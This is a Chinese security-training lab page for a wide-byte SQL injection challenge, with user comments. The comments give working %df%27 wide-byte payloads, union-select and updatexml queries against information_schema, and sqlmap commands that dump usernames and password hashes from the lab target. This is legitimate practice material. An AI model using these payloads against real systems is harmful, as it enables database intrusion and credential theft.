SQL注入漏洞测试(宽字节)

SQL注入漏洞测试(宽字节)

难易程度 :

增加能力 : 60(完成可获得能力值)

消耗墨币 : 5墨币

分类 : SQL注入

标签 : SQL注入

启动靶场环境靶场有1011人完成/814人放弃

点击启动靶场环境 访问靶场 解题找到KEY 提交KEY 发表解题思路 完成

背景介绍

一位不知名的朋友向“墨者”工程师发起挑战,“墨者”工程师二话没说立即开始注入,不过发现经常使用的注入方式无效,你能帮助“墨者”工程师完成这个挑战吗?

实训目标

1、掌握SQL注入原理;
2、了解MySQL的数据结构;
3、了解宽字节的提交方式;

解题方向

使用宽字节注入,从数据库中获得用户密码,登录后台拿到key。

靶场设计者(发表评论)
当前靶场共有22611人浏览, 已有1011人完成

该功能稍候开放!
墨者 墨者
墨者学院,专注于网络安全人才培养!

评论(请勿在评论区发表解题思路)

大神,发表一下您的看法吧!立即注册

  • quanguodiyi

    quanguodiyi8/6/2023, 2:06:16 PM

    HTTP/1.1 502 Bad Gateway Warning: 199 "martian" "dial tcp 124.70.71.251:44193: connectex: No connection could be made because the target machine actively refused it." "Sun, 06 Aug 2023 22:04:53 GMT"

    (0)

  • Cc.tt

    Cc.tt5/29/2023, 2:37:49 AM

    账号密码拿到了登录的时候登不进去

    (4)

  • 17198366310

    171983663104/6/2023, 3:01:09 AM

    感谢墨者靶场 尽管自己作为曾经sqlmaap工具手 但是 手注让我更能完成工具完成不了的事 和理解原理

    (0)

  • 17198366310

    171983663104/6/2023, 2:58:05 AM

    课堂总结:宽字节过滤第一个单引号后 后边的不能再出现单引号了 1:发现group_concat()函数显示不全 2查询语法 反引号和单引号好像都不行,那这样写筛选?表名不需要单引,但表名需要啊 请看实例:and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)limit 0,1),0x7e),1) --+

    (0)

  • 阿三大苏打

    阿三大苏打12/23/2022, 1:25:44 PM

    第一步 使用kali里面 sqlmap sqlmap - u "网站" --current-db --current-user 爆出数据库 第二部 sqlmap - u "网站" -D 数据库名 --tables --batch 爆出表名 第三步 sqlmap - u "网站" -D 数据库名 --T 表名 --columns --batch 爆出列名 第三步 sqlmap - u "网站" -D 数据库名 --T 表名 --dump -C "name,password" --batch 爆出密码 只是总结自己的理解

    (0)

  • touxiang

    LRJ111/11/2022, 7:59:20 AM

    @LRJ1:利用宽字节%df绕过转义,爆出账号密码,怎...

    好了,今天咋就登上了,KEY已提交。

    回复 (0)

  • LRJ1

    LRJ111/8/2022, 4:26:25 PM

    利用宽字节%df绕过转义,爆出账号密码,怎么解码(sqlmap也跑了遍)后登入一直显示错误信息。。。是哪出问题了呢?

    (2)

  • touxiang

    west_wind7/14/2022, 9:09:08 AM

    @qqqzzz:sqlmap.py -u 219.15...

    为啥我用sqlmap扫不出来

    回复 (0)

  • touxiang

    罗先森5/24/2022, 2:41:09 AM

    @xiaozhang-w:已经用sqlmap拿到用户名...

    有俩个用户都是mozhe,用第二哥解密的密码登录即可。

    回复 (1)

  • touxiang

    冯上3/24/2022, 6:50:21 AM

    @thelmc:我就想请问一下 http://219....

    单引号转义

    回复 (0)

  • touxiang

    涛哥6663/19/2022, 6:15:50 AM

    @qwe1433223:为什么表名的十六进制前面要加0...

    因为要告诉数据库后面是16进制,而不是简单的数字了

    回复 (0)

  • touxiang

    白学12/29/2021, 2:27:56 PM

    @thelmc:我就想请问一下 http://219....

    因为你的表名的单引号也会被魔术引号加上反斜杠进行转义

    回复 (0)

  • 白学

    白学12/29/2021, 2:26:24 PM

    魔术引号主要是将用户输入的单双引号以及反斜杠和空值进行转义。我们要想办法让转义被过滤。

    (0)

  • qqqzzz

    qqqzzz9/29/2021, 3:16:13 AM

    sqlmap.py -u 219.153.49.228:44660/new_list.php?id=1 先看看 然后sqlmap.py -u 219.153.49.228:44660/new_list.php?id=1 --dbs 出数据库 sqlmap.py -u http://219.153.49.228:44471/new_list.php?id=1 -D stormgroup -T member --dump --batch 直接密码就出来了

    (0)

  • xiaozhang-w

    xiaozhang-w9/18/2021, 7:27:45 AM

    已经用sqlmap拿到用户名和MD5加密的密码,解码后一个用户名禁用,一个总提示密码错误,问题出在哪里了

    (4)

  • 初学者12138

    初学者121389/15/2021, 2:52:18 AM

    %df%27 用这个测试发现报错即存在宽字符注入漏洞 用注入工具url:http://219.153.49.228:46406/new_list.php?id=1%df%27跑 完事获取库 获取表 获取内容 有两行 完事MD5解密登录即可

    (0)

  • thelmc

    thelmc6/21/2021, 11:10:53 AM

    我就想请问一下 http://219.153.49.228:44611/new_list.php?id=1.1 %df'union select 1,2,3,4,(select group_concat(table_name) from information_schema.tables where table_schema=database()) -- www 这样可以出现表名,为什么http://219.153.49.228:44611/new_list.php?id=1.1 %df'union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='notice'),4,5 -- www 为什么字段出不了? 这靶场有问题吧 真的很搞人心态 我就差骂人了

    (4)

  • touxiang

    poplar@墨者4/29/2021, 3:44:21 AM

    @djhd:得到md5,解密后全部登不上。。。。...

    您好,经过测试,本环境是没有问题的;您后续有什么问题的话,可以进QQ群反馈。

    回复 (0)

  • 大文

    大文4/25/2021, 2:25:41 PM

    直接%df'过

    (0)

  • touxiang

    qwe14332234/19/2021, 6:36:04 PM

    @初冬123:宽字节原理自己百度,这是推荐:http:...

    为什么表名的十六进制前面要加0x啊

    回复 (0)

大神,别默默的看了,快登录发表解题思路吧!立即注册

英雄榜

用户登录

提交当前靶场KEY

确认支付

当前剩余墨币为 需支付墨币 5 (购买该环境后有效期为0天)

加入墨者学院可立即获得20墨币

可免费开启靶场环境

点击注册领取

已有账号,立即登录